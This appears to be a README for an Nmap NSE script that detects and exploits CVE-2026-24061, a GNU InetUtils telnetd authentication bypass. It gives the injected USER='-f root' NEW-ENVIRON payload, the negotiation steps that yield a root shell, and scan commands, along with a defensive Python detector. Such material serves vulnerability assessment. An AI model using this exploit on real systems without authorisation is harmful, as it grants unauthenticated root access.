This Nmap NSE script detects CVE-2026-24061, an authentication bypass vulnerability in GNU InetUtils telnetd versions 1.9.3 through 2.7.
By sending a crafted USER environment variable of the form -f <username> during
Telnet option negotiation, an unauthenticated attacker can obtain a shell with the
privileges of the specified local user — including root — without providing any
password.
Intended Use: Authorized penetration testing and vulnerability assessment only.
Running this script against systems without explicit written permission is illegal.
| Field | Value |
|---|---|
| CVE ID | CVE-2026-24061 |
| Affected | GNU InetUtils telnetd 1.9.3 – 2.7 |
| CVSSv3 Score | 9.8 Critical |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Type | Authentication Bypass (CWE-287) |
| Disclosure | 2026-01-01 |
GNU InetUtils telnetd uses the Telnet NEW-ENVIRON option (RFC 1572) to receive
environment variables from the client during the negotiation phase. The login(1)
program is then invoked with those variables.
The vulnerability arises because telnetd passes the USER variable directly to
login without sanitising it. The login program on Linux accepts a -f <user>
flag meaning "pre-authenticated, do not check password". By injecting
USER="-f root" via the NEW-ENVIRON payload, the attacker bypasses authentication
entirely.
```
Client → Server: IAC SB NEW-ENVIRON IS VAR "USER" VALUE "-f root" IAC SE
Server response: spawns login -f root → root shell, no password required
```
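A defender-side view of the exchange above, as an added example that is not part of the NSE script or this README: it parses client-to-server Telnet bytes, extracts NEW-ENVIRON variables per RFC 1572 (including `IAC IAC` and `ESC` escaping), and flags `USER` values that begin with a hyphen. The function names, the sample streams and the "leading hyphen" rule (a generalisation of the `-f <user>` form) are assumptions made for illustration.

```python
IAC, SB, SE, NEW_ENVIRON = 255, 250, 240, 39   # Telnet commands, option 39
IS, INFO = 0, 2                                # RFC 1572 sub-commands
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3          # RFC 1572 field markers

def subnegotiations(stream):
    """Yield (option, payload) for each complete IAC SB ... IAC SE block."""
    i, end = 0, bytes([IAC, SE])
    while i + 2 < len(stream):
        if stream[i] != IAC:
            i += 1
        elif stream[i + 1] != SB:
            i += 2  # some other command, or an escaped 0xFF (IAC IAC)
        else:
            opt, body, i = stream[i + 2], bytearray(), i + 3
            while i + 1 < len(stream) and stream[i:i + 2] != end:
                if stream[i] == IAC and stream[i + 1] == IAC:
                    i += 1  # IAC IAC encodes a literal 0xFF
                body.append(stream[i])
                i += 1
            if stream[i:i + 2] == end:  # truncated blocks are not reported
                yield opt, bytes(body)
            i += 2

def parse_environ(payload):
    """Return [(name, value)] from an IS/INFO payload; value is None if absent."""
    if not payload or payload[0] not in (IS, INFO):
        return []
    tokens, i = [], 1
    while i < len(payload):
        marker = payload[i] in (VAR, VALUE, USERVAR)
        if payload[i] == ESC and i + 1 < len(payload):
            i += 1  # ESC: the next byte is literal data, not a marker
        if marker:
            tokens.append((payload[i], bytearray()))
        elif tokens:
            tokens[-1][1].append(payload[i])
        i += 1
    nxt = tokens[1:] + [(None, b"")]
    return [(bytes(n), bytes(v) if k2 == VALUE else None)
            for (k1, n), (k2, v) in zip(tokens, nxt) if k1 != VALUE]

def flagged_user_values(stream):
    """Assumed rule: a USER value starting with '-' would reach login(1) as an option."""
    return [v for opt, p in subnegotiations(stream) if opt == NEW_ENVIRON
            for n, v in parse_environ(p) if n == b"USER" and v and v.lstrip().startswith(b"-")]

# Constructed client-to-server byte streams (not captured traffic)
HEAD = bytes([IAC, 251, NEW_ENVIRON, IAC, SB, NEW_ENVIRON, IS, VAR]) + b"USER" + bytes([VALUE])
BENIGN = HEAD + b"alice" + bytes([IAC, SE])
CRAFTED = HEAD + b"-f root" + bytes([IAC, SE])
```

`flagged_user_values(CRAFTED)` returns the offending value, while `BENIGN` and a stream cut off before `IAC SE` return an empty list.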
| Field | Value |
|---|---|
| Filename | telnet-vuln-cve-2026-24061.nse |
| Categories | vuln, exploit, intrusive |
| Port | TCP/23 (telnet) |
| Tested on | Nmap 7.94 / 7.98, Windows & Linux |
The script performs a full Telnet negotiation mirroring the exact byte sequence
of a real telnet -a client session (reconstructed from Wireshark capture):
- Receive server's opening IAC burst (`DO TTYPE`, `DO TSPEED`, `DO ENVIRON`, …)
- Reply with complete client capability announcement (`WILL TTYPE`, `WILL LINEMODE`, …)
- Complete sub-negotiation round (`SB TSPEED`, `SB ENVIRON`, `SB TTYPE`)
- Inject crafted `USER='-f <user>'` in the NEW-ENVIRON IS payload
- Complete the `WILL ECHO` / `DO BINARY` / `WONT LINEMODE` sequence (critical — without this, telnetd cannot finalise PTY setup)
- Check whether the server sends a login shell prompt without a password challenge
Result states:
| State | Meaning |
|---|---|
| `EXPLOIT` | Shell prompt received — bypass confirmed |
| `LIKELY_VULN` | ENV payload accepted, no password prompt, but no shell prompt |
| `NOT_VULN` | Password prompt seen, or negotiation did not complete |
```bash
# Copy to Nmap scripts directory
sudo cp telnet-vuln-cve-2026-24061.nse /usr/share/nmap/scripts/
# Update script database
sudo nmap --script-updatedb
```

```
# Copy to Nmap scripts directory (adjust path if needed)
copy telnet-vuln-cve-2026-24061.nse "C:\Program Files (x86)\Nmap\scripts\"
# Update script database (run as Administrator)
nmap --script-updatedb
```

```bash
nmap -p 23 --script telnet-vuln-cve-2026-24061 <target>
```

```bash
# Short form
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args user=kali <target>
# Medium form
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args telnet-user=kali <target>
# Fully qualified
nmap -p 23 --script telnet-vuln-cve-2026-24061 \
--script-args telnet-vuln-cve-2026-24061.user=kali <target>
```

```bash
nmap -p 23 --script telnet-vuln-cve-2026-24061 192.168.1.0/24
```

```bash
nmap -p 23 --script telnet-vuln-cve-2026-24061 -v <target> # verbose
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d <target> # debug
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d2 <target> # full hex trace
```

```
PORT STATE SERVICE
23/tcp open telnet
| telnet-vuln-cve-2026-24061:
| VULNERABLE:
| GNU InetUtils telnetd Authentication Bypass
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2026-24061
| Risk factor: Critical CVSSv3: 9.8
| Description:
| The telnetd service in GNU InetUtils (1.9.3 - 2.7) allows
| authentication bypass via a crafted USER environment variable.
| Sending '-f <user>' results in an unauthenticated login shell.
| Extra information:
| Authentication bypassed: shell prompt received after injecting
| USER='-f root' -- no password challenge was presented.
| References:
| https://nvd.nist.gov/vuln/detail/CVE-2026-24061
| https://github.com/JayGLXR/CVE-2026-24061-POC
|_ https://github.com/SafeBreach-Labs/CVE-2026-24061
```

```
PORT STATE SERVICE
23/tcp open telnet
```

(no script output — NOT_VULN is silent by design, standard Nmap convention)

| Argument | Alias(es) | Default | Description |
|---|---|---|---|
| `telnet-vuln-cve-2026-24061.user` | `telnet-user`, `user` | `root` | Username to inject via `-f` |

GNU InetUtils telnetd uses the Linemode negotiation (RFC 1184) to determine the
terminal I/O mode. The server sends DO LINEMODE early in negotiation, and the
client initially responds WILL LINEMODE. After the ENV payload exchange, the server
sends WILL ECHO followed by DO BINARY. At this point the client must respond
with WONT LINEMODE to signal character-at-a-time mode — only then can telnetd
complete PTY setup (ioctl TIOCSWINSZ) and fork login. Without this step, the
server logs peer died: Inappropriate ioctl for device and drops the connection.
Nmap's NSE socket API differs from standard Lua socket conventions:
```lua
-- Nmap NSE (correct):
local status, data = sock:receive_bytes(1)
if status == true then
  -- data is the received string
end
```

- NVD — CVE-2026-24061
- PoC by JayGLXR
- PoC by SafeBreach-Labs
- RFC 1572 — NEW-ENVIRON
- RFC 1184 — Linemode
- Nmap NSE Documentation
This script is provided for authorized security testing and research purposes only. The author is not responsible for any misuse or damage caused by this tool. Always obtain explicit written permission before testing systems you do not own.